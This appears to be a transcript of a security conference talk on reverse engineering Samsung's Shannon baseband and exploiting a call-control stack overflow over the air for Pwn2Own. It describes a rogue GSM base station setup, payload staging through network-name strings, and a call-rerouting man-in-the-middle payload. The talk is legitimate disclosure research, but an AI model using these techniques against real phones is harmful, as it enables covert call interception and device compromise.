binary. It's like 40 megabytes. But as you can see, no such luck before. These images are clearly somehow encoded, compressed or encrypted or what have you. And there's not a whole lot to fall back on because we also did that, of course, look at previous firmware variants for older devices. And in those cases, the main code was always plain text as well. So then you want to get an idea for, okay, what are we dealing with? Is this some known compression or known packing or some kind of maybe naive crypto and you get lucky. And a good thing that you can do is just look at the entropy of the image. Craig has an awesome blog post to explain this in detail. So we're not going to go into that. But the bottom line is just by the results, it's clear that this is some kind of a proper crypto. So then you have to think about, okay, well, how am I going to get back the plain text code? And we looked at a couple options and hit a bunch of dead ends and then eventually figured something out. So first we going back to the boot code, we looked at that. 
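A quick sketch of that kind of entropy check, a sliding-window Shannon entropy over the image; the file name and window size here are arbitrary choices:

    import math
    from collections import Counter

    def shannon_entropy(chunk: bytes) -> float:
        counts = Counter(chunk)
        total = len(chunk)
        return -sum((c / total) * math.log2(c / total) for c in counts.values())

    def entropy_profile(path, window=4096):
        data = open(path, "rb").read()
        for off in range(0, len(data), window):
            chunk = data[off:off + window]
            if chunk:
                yield off, shannon_entropy(chunk)

    if __name__ == "__main__":
        for off, ent in entropy_profile("modem.bin"):   # placeholder file name
            print(f"0x{off:08x}  {ent:5.2f}")   # ~8 bits/byte everywhere suggests real crypto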
But the bottom line is that if you start reverse engineering the code, it gets apparent very quickly that essentially everything that's interesting to you, so the decryption and the signature checking, is just done by tight copy loops that are essentially leveraging memory-mapped IO. What that means is there are dedicated hardware pieces in the SoC that will do the decryption, will do the signature checking and so on. So without some hardware based debugging support, that's going to be pretty hard to figure out. So then the next thing we looked at is TrustZone on the device. We just had the hunch that we might find the functionality that is used for loading or assisting the loading in trustlets, just because Samsung has the habit of putting a lot of value-added features into their trustlets, Knox and what have you. However, in this case, this turned out to be a dead end as well. And then so then we looked at, okay, what's happening on the Android side, since presumably somehow Android would play a role in loading up this image. And so then you just look around a little bit in the boot logs and the radio logcat and the file system and running processes. And long story short, we found this one process which is called CBD, which apparently stands for the cellular processor boot daemon. And even though this is involved in the loading of the image, as you will see in a second, for the purposes of figuring out how to decode or decrypt the image, this also turns out to be a dead end. And the reason for that is because, as it turns out (and again, this was basically just doing some old-fashioned reversing of the image; of course, this was the first Samsung phone using 64-bit for Android as well, so I guess the Hex-Rays ARM64 decompiler plugin would have been super awesome six months earlier, but you know, what are you going to do), we were able to figure out relatively quickly that really all that this does is it processes this TOC format to get the chunks and then uses the SPI connection to send it over to the modem side. And that of course matches up with what we see in the boot code, which just takes these chunks and then does the crypto magic to actually decrypt them and then load them. And then so at first sight, that's basically not helpful for us. But in the end, it turns out that the CBD still gives us what we were looking for. And the reason for that is that even though it's pretty limited, it just does a few things: so it can basically start and restart the baseband, and there's a couple more commands that it can do. And it nicely has a help menu that will list all the commands. In the case of the S6, the function that's interesting has actually been renamed to test. So that doesn't tell you all that much. But we also looked at other phones and some older variants where the same command just specifically says, this is a RAM dump, you can dump the baseband memory with it. So that's pretty apparent what that's going to do. And sure enough, this of course requires root. But if you're root on the phone, you can just instruct the CBD to give you a memory dump of the baseband. And at first look, it's obvious that, okay, well, nice, there's the code, there's the strings. So we got some kind of representation of the live memory of the baseband. But it's not perfect yet, especially because, I guess in this context it's annoying, but in the larger picture it's a pretty great thing from Samsung that they actually continue to regularly update their devices.
But from the perspective of the reverse engineer trying to maintain root, and also trying to keep up with the firmware variants, that's a problem. But as we found out later, it's really not in your way, because it turns out that you don't need root to control the CBD, because there's just a few hidden dialer codes that you can hit up to re-enable debugging functionality and then just use the menu to get the same exact RAM dump. And just as a sidebar, if you wanted to do some kind of reverse engineering on Android phones, this is actually very typical of OEMs, to add debug enablement into these dialer-code-invoked menus. And in particular, XDA Developers tends to be a very good forum with rich information on that. So really, if you're trying to debug anything on an Android phone, you know, go through the forums first, and you probably will find some nice shortcuts like this. In any case, okay, so we got a RAM dump, but it's obviously not exactly the same as an understood file format. So we would still have to figure out, okay, well, how you would create like an IDA loader for this. And for that, we had to go back a little bit to the boot section and the CBD as well. And on this, we were lucky again, since it wasn't really that difficult to identify a piece of code that's static in the boot image that basically lists out which memory areas are then stitched together into the RAM dump that ends up being this 130 megabyte dump that's sent over to Android. So now actually reverse engineering can start, because you have the segments. Of course, you don't know everything about them, like the permissions and what's code and what's data, but you have just about enough to put together a basic IDA loader. So I think I will take it from here.
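As an aside on what that loader preparation can look like in practice, here is a small sketch that carves a RAM dump into per-region files you can then map at their base addresses in a disassembler. It assumes the dump is a straight concatenation of the regions in table order, and the segment names, addresses, and sizes are made-up placeholders, not the recovered Shannon layout:

    import os

    # (name, base_address, size) -- illustrative values only
    SEGMENTS = [
        ("boot", 0x00000000, 0x00010000),
        ("main", 0x40000000, 0x02800000),
        ("data", 0x44000000, 0x01000000),
    ]

    def carve(dump_path, out_dir="segments"):
        os.makedirs(out_dir, exist_ok=True)
        with open(dump_path, "rb") as f:
            offset = 0
            for name, base, size in SEGMENTS:
                f.seek(offset)
                blob = f.read(size)
                out = os.path.join(out_dir, f"{name}_0x{base:08x}.bin")
                with open(out, "wb") as o:
                    o.write(blob)
                print(f"{out}: load at 0x{base:08x}, {len(blob):#x} bytes")
                offset += size

    if __name__ == "__main__":
        carve("cpdump.bin")   # placeholder name for the CBD RAM dump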
So the first thing we did was assist IDA a little bit with the detection of functions. So this is probably something that a lot of you guys have done before. So this is not meant to pick on IDA at all. Like function detection is a fairly complex problem, especially if you don't detect functions only via control flow. But essentially to make sure that we actually have all the code that we want to find bugs in, we first wrote an IDA plugin that is simply scanning for certain ARM prologues and then creates a function at that point. And even though that also includes false positives, these actually hurt very little throughout the process. Then getting to strings. So people usually look at strings, try to find like meaningful strings and then go back at the cross references, start labeling functions. But this doesn't scale. So for such a binary, we have like roughly 100,000 functions, 100,000 strings, which is also something that's quite common in basements, mostly for like debugging. So you have like various tools running on a PC that are used by modem engineers to do debugging in the field. And you have all kinds of strings like state strings. You have file path information, which is very valuable because this gives you kind of hierarchical information about the code. So every function that is including, let's say GRR is probably part of that particular layer or even that task. But our message or our thought at this point was really that any kind of automatic labeling is going to be more useful than the default subnames. So what we did at the first step here was we essentially categorized all strings into two buckets. The first one is what we call exec strings. And those are strings that keep appearing with certain types of functions. So assert functions like fatal error, things that give you some kind of debug information, tell you in what kind of file a crash was. And this is essentially strings that give you something meaningful about what the underlying functionality may be, where that code actually lives. The second category then is essentially everything else. So you don't just want to take everything that is a string because that contains a lot of crap as well. So we did some filtering and normalization and essentially limit this to everything that has a certain length, contains certain characters. And then we use this information to, yeah, apply labels to all the functions that make use of these. Now I don't want to go too much into the actual heuristics that we used here. It's also because we will release that code anyway so you can have a look. But essentially we use the mix between deciding, okay, is this function using an exec string? Is this also using a fuzzy string? And then either use a combination of these or prefer the exec string. And once you are at that point where you label these functions, you can also go one step back and start labeling the functions that call these. So we simply, like what you see here is we labeled this calls SMS something. And this gives you a lot more meaning to the actual binary when you have such a big mass of functions. And in our case, this gave us roughly 20,000 labeled functions, which is actually a lot if you think about that the original binary was 70,000 functions. The next step then is, okay, we want to identify how the real-time operating system works. And the way this is usually implemented is by using low-level instructions of that particular architecture. 
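Going back to the function-detection step for a moment, a minimal sketch of such a prologue scan run over a raw dump outside of IDA could look like this. The ARM-mode PUSH {..., LR} encoding is real, but the base address and file name are placeholders, Thumb prologues would need a separate pattern, and a real plugin would of course create the functions directly in the database:

    import struct

    BASE = 0x40000000          # placeholder load address of the dumped segment

    def find_arm_prologues(data: bytes):
        """Scan for ARM-mode PUSH {..., lr} (STMFD sp!, {..., lr}), i.e. 0xE92D4xxx words."""
        hits = []
        for off in range(0, len(data) - 3, 4):      # ARM mode: 4-byte aligned
            word = struct.unpack_from("<I", data, off)[0]
            if (word & 0xFFFF4000) == 0xE92D4000:   # STMFD sp! with LR in the register list
                hits.append(BASE + off)
        return hits

    if __name__ == "__main__":
        dump = open("main_0x40000000.bin", "rb").read()   # placeholder segment file
        for ea in find_arm_prologues(dump)[:20]:
            print(f"possible function start at 0x{ea:08x}")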
And on the Cortex R7, what you are looking for is essentially MCR instructions that are used for things like flushing caches, doing tasks and things like that. And unfortunately, IDA by default doesn't know these. So we wrote another plugin which currently supports the R7, R9 and R11 and essentially annotates all of these with a comment. And once you are there, just by looking at what the comment actually is, it's pretty easy to tell what the actual functionality is. So if you see, okay, this is cleaning the data cache and invalidating the instruction cache and afterwards writing to a system control register, then this is very likely actually enabling these caches. So that was the first thing that we did, and that helped us to kind of find the primitives that we also use later on for exploitation. But we certainly want to know a little bit more. So we want to know, okay, what kind of privilege level is this running at? How do we find tasks, which are usually used in cellular basebands to implement various parts of the radio stack? How do these talk to each other? How is the stack and the heap managed, which is going to be important for exploitation? And going from there, how do we actually find the radio code, which is going to be the meat of this? So first getting to the execution mode, this is usually fairly straightforward. So on an architecture like ARM, you would expect some kind of kernel/user space split and then have essentially supervisor call instructions that would trap into the kernel, implement a syscall functionality and then eventually return. And while this exists on Shannon as well, it's not really used that much. So there's a couple of SVC handlers, but mostly they are used for RAM dumping and resets, which is obviously not enough to implement a proper API similar to other real-time operating system APIs. So at that point, and also having seen some register contents at that point already, we concluded, okay, this is going to be very likely all supervisor mode all the time. Ultimately, we had to verify this of course when writing an exploit, but I can tell you already that Shannon is running for the most part in supervisor mode, which means also that there is absolutely no separation between tasks that are running there. So yeah, any compromise there will have quite severe consequences. So the next thing you want to do then is, okay, you want to identify where your actual radio layer is implemented. And as I mentioned, this is usually done using tasks. And there's essentially two approaches here. One is harder. So what you can do in almost every case is you find your way through the interrupt vector table, you look at the reset handling and walk your way all the way through the initialization of tasks. But this can be very long. And for a big binary, this is definitely challenging. So we actually took a different route here. And we essentially made use of the fact that, okay, we have a RAM dump and every task that is running at that time is going to make use of data in that RAM dump. So that also means it's going to make use of stacks essentially. So what we did was we essentially scanned for typical call frame patterns in that RAM dump and essentially backtraced that, similar to a debugger. And eventually you reach a point where your backtrace hits a wall, and then this is going to be very likely the place where your stack is initialized. And that is also the place usually where your task is initialized.
So at that point you find like a linked list which is setting up these tasks and that you can walk. And we also wrote a script for that. And that brings us to what you see here essentially on the right. So this is a listing of, not all the tasks, but some: you see there's one for mobility management, which is one part of the radio stack. There's call control. And it's actually also quite a lot of tasks. So you see it's roughly 100 tasks. But going from there you can look at the actual radio parts. Now the next thing you want to know is, okay, how do these tasks get messages? Like when is an OTA, like an over-the-air message, processed by this task? And this is definitely not trivial, but all the tasks in a real-time operating system usually follow one prominent pattern. And that is you essentially have a loop that is dequeuing a message somehow and then does processing on the message. And yeah, this is also the case here. So this is an example from, I'm not sure if you can read this, hopefully. This is an example from the call control task. So you have one function at the top, which is essentially dequeuing a message. And reversing that, there's unfortunately no silver bullet for that. Obviously it helps if you work at a vendor that is implementing basebands. Even though there's various projects like OpenBSC or Osmocom where you can essentially get a feeling for how this implementation may look. But anyway, all this is doing is it's dequeuing a message and stuffs that into like a global data structure. Then you have another function which is processing this message and eventually the same repeats. And as you can also see here, and this gives you an idea of how much we actually understand about Shannon, like there's a bunch of stuff here we have no idea about, which is very likely related to like signals or state handling. But it doesn't really matter. But just identifying these prominent patterns is actually fairly straightforward. Now the memory management is also going to be interesting for writing exploits. So I've mentioned how we were able to find some stack area and walk our way back to understanding tasks. Looking at this also gives you information on how the actual stacks are managed though. So just by looking at the task initialization, you see that, okay, the structure also contains like the top and the bottom of your stack. So there's nothing special about these on Shannon. So these are all contiguous in memory. They all start at a static location, and in between you have DEADBEEF markers which are used for checking stack overflows. And then you look at the heaps, which are a little bit more tricky but also fairly straightforward to identify. Once you realize, okay, there's a fairly prominent call pattern: something is allocated, you have some data copied into a heap chunk. So it's fairly easy to spot these. And even though we reverse engineered pretty much the entire heap implementation, it's not too interesting. So this is a classic slot-based allocator that organizes memory chunks in buckets of different sizes and you have like a doubly-linked free list. So this is mostly a reference for you guys. How about memory configuration? So the ARM Cortex R7 is nicely enough not using an MMU. So that makes figuring out the configuration a little bit more easy because you don't have to walk page tables or come up with any sophisticated tracing of the code here.
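Going back to the call-frame scanning used to find the task stacks, a hedged sketch of that idea is below: walk the data part of the dump looking for 32-bit words that could be saved return addresses, meaning values that point into the code region right after something that decodes as an ARM BL. The ranges and file names are placeholders, and Thumb or conditional calls are ignored here:

    import struct

    CODE_BASE, CODE_SIZE = 0x40000000, 0x02800000   # placeholder code region
    DATA_BASE = 0x44000000                          # placeholder data/stack region

    def looks_like_return_address(code: bytes, value: int) -> bool:
        if value & 3 or not (CODE_BASE + 4 <= value < CODE_BASE + CODE_SIZE):
            return False
        off = value - 4 - CODE_BASE
        if off + 4 > len(code):
            return False
        word = struct.unpack_from("<I", code, off)[0]
        return (word >> 24) == 0xEB      # unconditional ARM BL right before the return site

    def scan_for_frames(code: bytes, data: bytes):
        for off in range(0, len(data) - 3, 4):
            value = struct.unpack_from("<I", data, off)[0]
            if looks_like_return_address(code, value):
                yield DATA_BASE + off, value

    if __name__ == "__main__":
        code = open("main_0x40000000.bin", "rb").read()   # placeholder segment files
        data = open("data_0x44000000.bin", "rb").read()
        for where, ret in scan_for_frames(code, data):
            print(f"saved LR candidate at 0x{where:08x} -> returns to 0x{ret:08x}")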
But really all of this is controlled again with MCR instructions so that we could essentially reuse some of the scripting that we already had at this point. And just by looking again at the comments, it's fairly easy to spot a function which is used to configure the MPU which is going to be some kind of wrapper that is then called. And tracing this, you get a pretty good understanding of how the memory looks like. So at that point, we knew precisely what kind of memory regions are there, what kind of permissions they have, what bits are set, which on the one hand allowed us to improve our loader, but on the other hand was also useful for exploitation. So one thing you see here already is that there's one region exist, for example, that has Xn and another one doesn't. I just realized you don't see my mouse pointer. Sorry about that. So yeah, at this point, you have all the information to go further with exploitation. Now there's one thing missing that I mentioned in the beginning which is we need some kind of debug capability. One thing that's nice on these devices is once the device crashes, it actually gives you some kind of crash information already. So in this case, you see like this is showing you it's a data abort. So that already gives you kind of a clue about, okay, what you may have hit with your payload there. But looking around for more information, we eventually found this nice function on the right here which is called dump reg values. And this essentially gives you a complete map of all the registers in memory. And for a while we were wondering, okay, how is this actually ending up? There is some memory map magic that does this, but turns out it's much simpler. So by simply following the interrupt vector and the exception handling here again, the exception handling is filling that information out once you hit a crash. And this essentially gives you a proper crash debugging. So you see you even have the bank registers. That was very useful to also tell whether we are running in supervisor mode or not at that point. But and what you're looking at next at this point is, okay, you want to do some more debugging, especially when the modem is running because this just is just useful once it already crashed. So we also looked into live debugging. One thing that's interesting in this context, there was a publication earlier this year about the fact that on Samsung modems, the UART is exposed over USB and you have an AT interface on that. And there are some privacy implications because you can essentially do calls and other things, even though the phone is locked, which you shouldn't be able to do. But turns out it's actually far worse because if you look at what Samsung really added there, one of the things they added is full memory read write for the modem, which at that point you can definitely use to build your own debugger, which we unfortunately didn't do mostly because once we were at that point, we were already so far into exploit development that we mostly use this for like poking a little bit at memory and looking at values. But yeah, it would be enough to build a debugger. So if anyone wants to do that, you're welcome. And as a general hint, so this is actually fairly common as well. So don't ever just assume that a baseband vendor would just have like the normal set of AT commands. It's definitely useful to look at this and there's usually a bunch of goodies hidden there. Okay, so going from there, we looked into finding bugs and then you're going to talk about that part. 
All right. I hope we still have the room we're kind of rushing along at light speed here. But now we're getting to the fun parts, I guess. And it also means that we're getting to the part where now we can no longer not show you 3GPP diagrams. Notice that up until now you didn't need to know anything about GSM or LTE or whatever. And you already have the understanding of you can debug the environment, you know what the tasks are for every task, you get an idea of what that is, where it starts, how you process these messages. So you're pretty far along. But at this point, you would need to make some kind of choice as well. Okay, well, what type of bug do I want to look for and in what? And at this point, it's useful to have the reference of, okay, what is the functionality here supposed to be? And based on that, we decided to look for memory corruption issues in the parsing of layer 3 messages or NAS messages. And the reason being is that that's based on the spec that's complicated enough to hopefully give you some opportunities and also the messages are long enough. That's an issue that sometimes with the lower layers of these stacks like RRC, for example, that the signaling messages are very short. So even if you find yourself maybe a buffer overflow or something like that, you might have a really hard time, you know, getting useful payloads. Not so much with NAS. So we have a target we would have to, based on that identify, okay, where's the task that I care about? And with some understanding of NAS, you will know that you will have tasks like mobility management and connection management. And particularly in connection management, a piece called call control, which as the name suggests, you know, you set up the calls, you manage your calls, you end the calls and messages like this. And all these messages, the way they are encoded is they use what they call information elements, which are basically just TLV or LV encoded chunks that comprise a message. And then in NAS message, we'll have some mandatory IEs and then usually quite a bunch of optional IEs. And so then what you will need to do is you will need to identify, okay, within the call control task, where is the parsing that happens that will take the wire format, split the dot into information elements, presumably put that into some kind of internal representation, and then start working on that to actually parse the message. And for that, I guess one approach you could take is take your understanding of what type of magic values and value ranges you're supposed to see when you look at a certain type of message and try to sort of identify that needle in the haystack. Or the more straightforward thing is to start from the top of the message processing within the call control and just go through that. And that's what we did. And no magic source here, it's just some manual reverse engineering. You would expect, and that's the case here, that what, so you don't have it that easy. So the, the, the, once you dequeue that message, you will have that pointer. It's not exactly the wire format just yet. It's going to be enveloped in some kind of Shannon proprietary internal structure representation. So you have to do some reversing to peel away the headers that they have. And then you finally find yourself at the point where, okay, well, now this is great. And I have a pointer. And I know that these bytes in their structure are going to correspond to what 3GPP says a message like this is supposed to look like. 
So basically you find yourself at a central function that we just named parse_IEs, which is used all across these different tasks like MM and SMS and so on, and also in CC. It goes ahead and uses a global array of definitions of what the information elements have to look like: what their type is, what the minimum size is and things like that. It then uses that in a big parsing loop to take every IE out of the message and fill out another global array, which is going to contain the representation of the currently present IEs. That again just means, for each IE, a pointer to where the actual bytes are, a length indicator, and whether this IE is currently present in the message or not, and so on. Once this parsing happens, a handler is picked from a dispatch table of handlers based on which type of message it is, and that handler processes the message. This is pretty good now, but for these tasks the number of messages they can handle is actually pretty large; for call control it is quite a few dozen, and only some of those correspond to actual over-the-air messages. Some of them are the handling of the Setup or the Alerting message and so on, but then there's a bunch which are internal messages exchanged between lower-layer tasks and CC. If you have no hints, something you can do is use your understanding of which information element is put where in memory. You can take your knowledge of, let's say, which IEs a Setup message is supposed to contain, look at the parsing, see which entries of that definition array it uses, and try to match it that way. That would be more complicated. Luckily here it was a lot easier, because in this array of handlers, as you can see on the screenshot here, you don't just get an ID and the pointer to the handler, you also get a nice log string which basically tells you which message this is. It even contains the tag "radio message" for the ones that are over-the-air handlers. So it becomes really easy to precisely label these. At this point we basically know, for the task, the exact handler that handles a given message, and we understand how it gets its input, and more importantly, what part of it is tainted and what constraints even exist on the length or the value pointer and so on. And you notice that there was maybe a five-minute period here where you had to be like, okay, I have to know 3GPP. Once again we find ourselves at a place where, hey, now it's just parsing. It might as well be Adobe Reader, whatever. There's an input, there are things like a length, you know how much it's constrained and how much it isn't, and you're basically operating on straight-up over-the-air messages. At that point you can pick your poison in terms of how you like to look for bugs. You can go for manual analysis and some scripting to help you find things like unbounded length values flowing into memcpys, or you could go for something more complicated, maybe run your own analysis on the decompiler output or whatever your favorite static analysis tool is. In our case, and this is a point that's important to make, it was relatively quick for us to find a vulnerability that was a winner for us, the one that we picked for Pwn2Own.
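As an aside, the data structures just described can be pictured roughly like this in C: a global IE definition table, a global array of parsed-IE slots, and a dispatch table whose entries carry the log strings that made labeling easy. All names, values and field layouts below are assumptions for illustration; only the general shape mirrors what was reversed.

#include <stdint.h>
#include <stdbool.h>

struct ie_def {                 /* global array: what each IE must look like */
    uint8_t iei;
    uint8_t min_len;
    uint8_t max_len;
    bool    mandatory;
};

struct ie_slot {                /* global array: what the parser fills out   */
    const uint8_t *value;       /* pointer to the bytes inside the message   */
    uint8_t        len;
    bool           present;
};

typedef void (*msg_handler_t)(const struct ie_slot *ies);

struct cc_dispatch_entry {      /* one row per call-control message          */
    uint8_t       msg_type;
    msg_handler_t handler;
    const char   *log_str;      /* e.g. "radio message SETUP" in the dump    */
};

/* Hypothetical dispatch table; the log strings are what make labeling easy. */
static void handle_setup(const struct ie_slot *ies)    { (void)ies; }
static void handle_progress(const struct ie_slot *ies) { (void)ies; }

static const struct cc_dispatch_entry cc_table[] = {
    { 0x05, handle_setup,    "radio message SETUP"    },
    { 0x03, handle_progress, "radio message PROGRESS" },
};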
And so that didn't really force us into a more in-depth bug hunting endeavor, so we feel like we're not in a position to answer questions like, okay, how buggy is this code? More importantly, when you talk about how to find bugs, you inevitably get the question, okay, how about fuzzing? In the interest of time I'll just skip over this. All I want to say is, it's not necessarily what we would recommend, but if you want to know why, ask us later. Now this takes us to the vulnerability that we actually used to get remote code execution. Samsung relatively quickly, in about a month, put out an advisory for the vulnerability. We don't really like their description all that much, so instead, here's what we actually submitted to them; you can read it on the slide. The bottom line is that one of the messages in call control is the Progress message, which contains one mandatory information element called the progress indicator, and this can be sent any time during an active call. Active call just means the call has to be at least alerting, so it doesn't have to be picked up yet. When the OS parses this message, there are basically no checks to prevent your classic stack-based buffer overflow when processing the length of the information element. It's easier to just look at the code. Really, what you end up with is more or less every bug hunter's dream. It's a straight-up stack-based buffer overflow where your input size can be more than 200 bytes, but the buffer that we're copying into is four bytes, and it's right at the very end of the stack frame, right next to the return address. And you have complete control over the values; there are no encoding limitations on your 200-or-whatever bytes either. So that's a pretty good situation. And now Nico's going to walk us through how we ended up building the exploit. Yeah, so obviously the point at Pwn2Own was to somehow show that you have arbitrary code execution. In the desktop space it's fairly easy to tell what kind of payloads those would be; on the radio stack it wasn't so clear what we actually wanted to do. But anyway, this is a simplified version of what we showed Dragos at Pwn2Own. So for those not familiar with the devices: on the left side you see the Galaxy S6, which is the phone that we're going to attack, then two other phones. We're first going to call the one in the middle and then see what happens. Oh, God. Is this playing? Okay, so we call 1338; that's important to memorize for this part. You see the phone is ringing, but we're not accepting the call, and otherwise there is no visible indication on that Galaxy S6. But at this point we have already exploited our bug. We call the same number again, and now all of a sudden the phone on the right is ringing. Now you may wonder why this is important. What we showed at Pwn2Own was, we gave Dragos the phone and said, okay, here, call yourself, and then the phone in my pocket was ringing. The idea we had was that on the one hand this is a fairly simple payload to implement, because it's below 100 bytes, nothing too long, but on the other hand it also gives you the capability to do a man-in-the-middle as long as you know what number was originally called.
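Before continuing with how the rerouting payload learns the originally dialed number, here is a deliberately simplified C sketch of the bug class just described: a length taken from the progress indicator IE is trusted and copied into a tiny stack buffer sitting next to the return address. Function and variable names are invented; the real routine differs in its details.

#include <string.h>
#include <stdint.h>

/* Simplified model of the vulnerable pattern (not Samsung's source). */
static void handle_progress_indicator(const uint8_t *ie_value, uint8_t ie_len)
{
    uint8_t progress_desc[4];            /* tiny buffer at the end of the frame */

    /* No clamp of ie_len against sizeof(progress_desc): with 200+ attacker-
     * controlled bytes this runs straight over the saved return address. */
    memcpy(progress_desc, ie_value, ie_len);

    (void)progress_desc;
}

/* A fixed version would clamp first:
 *   if (ie_len > sizeof(progress_desc)) return;  // or truncate
 */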
And 3GPP is nice enough to actually have a field for that, which is called the called party subaddress, which you can use to stuff in the original number, then initiate the new call and listen in the middle. Okay, so how do we actually deliver our payload over the air? I don't want to go too much into the background here; I think most of you have probably seen a talk about how to run your own GSM network or something like that. We used OpenBSC in our case, because this bug was exploitable over plain GSM. Then on the radio side you will need your BTS, and there are tons of options there too. Just mentioning the ones that we used: on the one hand the sysmoBTS that you can see there, and a USRP. So that's not an expensive setup; you can get this below 500 bucks, and I actually recently got a nanoBTS on eBay for 200. So there's really no barrier to this kind of research anymore. Now, once you are able to deliver your payload, the first thing you're going to run into is, okay, are there mitigations that actually prevent successful exploitation here? The good thing is Shannon is not entirely fragile, so it does do some checks. The 0xDEADBEEF markers that I mentioned earlier are used to check for stack overflows, you also have guard words in between heap chunks, and as mentioned, ARMv7 supports XN, and as we've seen, Samsung is also using that. So that sounds not that bad. However, on the bad side, there are no real baseline mitigations whatsoever. You don't have stack canaries, you don't have any metadata protection on the heaps, you don't have safe unlinking, and you don't have any randomization, since code isn't relocated at runtime. So in terms of the exploitation, and this is also why we didn't talk much about the bugs here, this is really partying like it's the 90s. And it gets even worse: they are using XN, but unfortunately they are not using it very effectively, because the heap and the stack are actually not among the areas protected by it, which we were very surprised about. At that point we had already compiled our nice ROP chains, and then we were like, oh, that was not even necessary. Yeah, so that much about mitigations. Looking at OTA exploitation, you're usually also looking for a couple of primitives that are useful along the way. The first thing you usually want is some kind of way to get controlled memory into the baseband, and hopefully you can also put it at an address which fluctuates less at runtime, or is maybe even static. There are two things that we found very useful for this. The first is the temporary mobile subscriber identity (TMSI), which is an ID assigned by the network and sent to the phone. This is essentially a known dword that you can place in memory. And then you also have the network name. This is the string that you see at the top of your phone which tells you, okay, this is T-Mobile. There's a long one and a short one, and I don't recall which one is which, but the nice thing is that one of them you don't see on the actual phone. So this is the second thing you can use to get your payload onto the device, and on ARM, conveniently enough, you can write alphanumeric shellcode as well. What's also nice about this area is that it is only fetched once you change networks, so as a result it is usually not cached.
So the usual caching problems you have on ARM, you don't have if you want to use the network name as a kind of trampoline to jump to the rest of your payload. The next problem you will run into is size restrictions. As we've seen, the IEs are usually not that large; most of the radio messages are definitely below 255 bytes, which is not a lot. But because of the way the code is written here, and Daniel talked about how you have these arrays that, for a certain type of message, specify which kind of handler gets called, you can essentially, to put it in hipster words, program your weird machine there: you execute certain functionality on certain radio messages. By doing that, you can nicely stage a payload in case you need more functionality. Usually you also want to have some kind of clean return. As we've seen in the video, the phone is not crashing. There's also actually a symbol at the top which gives you a small indication when the baseband crashes; in our case we didn't want any of that. Because of the way the tasks operate, by simply being loops that process messages over and over again, if you make sure that you set up your register values accordingly, you can essentially just jump back to the beginning of that loop and you're fine. The modem will keep functioning and will happily process the next stage of your payload or normal functionality, so that even when you go back to the normal network outside of our rogue BTS, you will have no problems whatsoever. And this is also similar for persistence. When we gave the phone to Dragos at Pwn2Own, the call was obviously happening in the normal network, so you want your payload to survive there somehow. No magic here again: flight mode or switching networks, none of that affects the functionality. As long as you can put a payload somewhere in the modem and you can keep executing it at some point, you will have no problems with persistence. And as most people don't regularly switch off their phones, that's not really a huge problem in practice, so we didn't have to look at persistence surviving reboots. There are some options for this; one is mentioned here. One thing you can look into is the loading of radio configuration values from NV. We didn't have to do that, but it's very likely also not a big problem in practice. So talking about payloads, you've seen that the demo is maybe not what you expected. Maybe some of you expected that, okay, we snatched all the photos or contacts from the phone. One thing we also touched on at the beginning is that people keep talking about how you have this second operating system, an operating system that can control everything on the device. But this is really not the case anymore, at least on most high-tier smartphones these days. The baseband is usually loaded by the application processor; it talks via HSIC or something like that to the application processor, but you have separation. Even though this may not be perfect, you really just have limited control. What you also don't have in the baseband directly are secrets that you can steal.
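Stepping back to the staging trick mentioned a moment ago, one way to picture it is a tiny stager hooked into a message handler that appends the payload bytes carried by each incoming message into a scratch buffer and only jumps to it once everything has arrived. This is a conceptual sketch with invented names and sizes, not the actual payload.

#include <stdint.h>
#include <string.h>

#define STAGE_BUF_MAX 4096u

/* Hypothetical scratch area in otherwise unused modem RAM. */
static uint8_t  stage_buf[STAGE_BUF_MAX];
static uint32_t stage_len;

/* Called from the hijacked handler each time a carrier message arrives. */
void stager_on_message(const uint8_t *chunk, uint8_t chunk_len, int last)
{
    if (stage_len + chunk_len > STAGE_BUF_MAX)
        return;                              /* drop instead of overflowing */
    memcpy(&stage_buf[stage_len], chunk, chunk_len);
    stage_len += chunk_len;

    if (last) {
        /* Relies on data being executable, as it is on this target. */
        void (*stage2)(void) = (void (*)(void))stage_buf;
        stage2();
    }
}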
So really, in terms of the payloads, as long as you don't escalate to the application processor side, you're looking at essentially messing with all the data that goes in and out of that modem, and exploiting the fact that there is nothing like end-to-end encryption. As I mentioned, in our demo we used that to reroute calls. Now, we also had two major fails that cost us a bit of time. The first one was related to caching. Originally we thought that for gaining persistence we would just patch some of the code by reconfiguring the memory regions. Turns out this was not working reliably for us, and we're actually still not sure what the reason is. One thing that's specific about Shannon in particular is a feature called the low latency interface, which is a way of essentially sharing RAM between different cores, and we were thinking maybe it's related, but really we have no clue. Eventually we went for patching data and function pointers in order to gain persistence, and just put our code in an unused part of the heap. The second problem, and this is definitely painful when you try to maintain your payload before the contest and make sure that with every update your ROP chains still work, is what we call the dual-SIM snafu, and this is Shannon specific. The S6 doesn't support two SIM cards, but apparently some Samsung devices do, and the way Samsung implemented this is by simply duplicating all of the functionality. So every function you will actually find twice; you also see that in the file names at the beginning. And that's a huge pain once you try to BinDiff symbols and port your changes. This is something you want to pay attention to, because otherwise you will spend a lot of time figuring out why your exploit doesn't work, because you used the wrong address again. So the last thing that people usually keep asking about, and this is definitely considered the holy grail in this space, is: okay, how do you escalate your privileges towards the application processor? This is definitely ongoing research on our side as well, so we can't claim that we did this. But we essentially see two main ways to do that, and one is actually not really modem specific, so there would be no magic about it at all. This goes back to the fact that the modem does see all the data that goes to the application processor. Just by coming up with a payload that makes use of the fact that you can inject stuff into that traffic, let's say you inject some small JavaScript that then is your payload for owning a browser, application processor escalation really becomes like every other exploit at Pwn2Own and has nothing to do with modems anymore. That's the less interesting route, though, at least from our perspective. The second route that is available is that you look at the IPC traffic that goes between these cores. There's obviously a lot of parsing and range checking done on this, and you also have some peripherals that you can access directly memory-wise. That is probably hard, but on the flip side, if you find a bug there, it's probably going to live for quite a while. What you are more likely to look at is the services that build on top of this; the RIL is a good example.
